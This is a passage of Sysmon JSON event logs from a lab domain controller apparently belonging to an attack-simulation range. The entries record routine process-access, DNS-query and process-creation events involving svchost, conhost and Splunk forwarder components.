C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6738,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6739,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6740,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6741,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.834\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B3-5F25-0000-00106C750900}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.834","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B3-5F25-0000-00106C750900}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":6742,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.310\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-00101EC40000}\r\nProcessId: 1204\r\nQueryName: WIN-DC-8400769\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.310","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-00101EC40000}","QueryName":"WIN-DC-8400769","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6743,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:59.959\r\nSourceProcessGUID: {E2A3D6B1-12B3-5F25-0000-00106C750900}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4540\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:59.959","SourceProcessGUID":"{E2A3D6B1-12B3-5F25-0000-00106C750900}","SourceProcessId":"4576","SourceThreadId":"4540","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6744,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.507\r\nProcessGuid: {E2A3D6B1-12B4-5F25-0000-001036770900}\r\nProcessId: 3864\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.507","ProcessGuid":"{E2A3D6B1-12B4-5F25-0000-001036770900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6745,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036770900}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.506","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036770900}","TargetProcessId":"3864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6746,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036770900}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 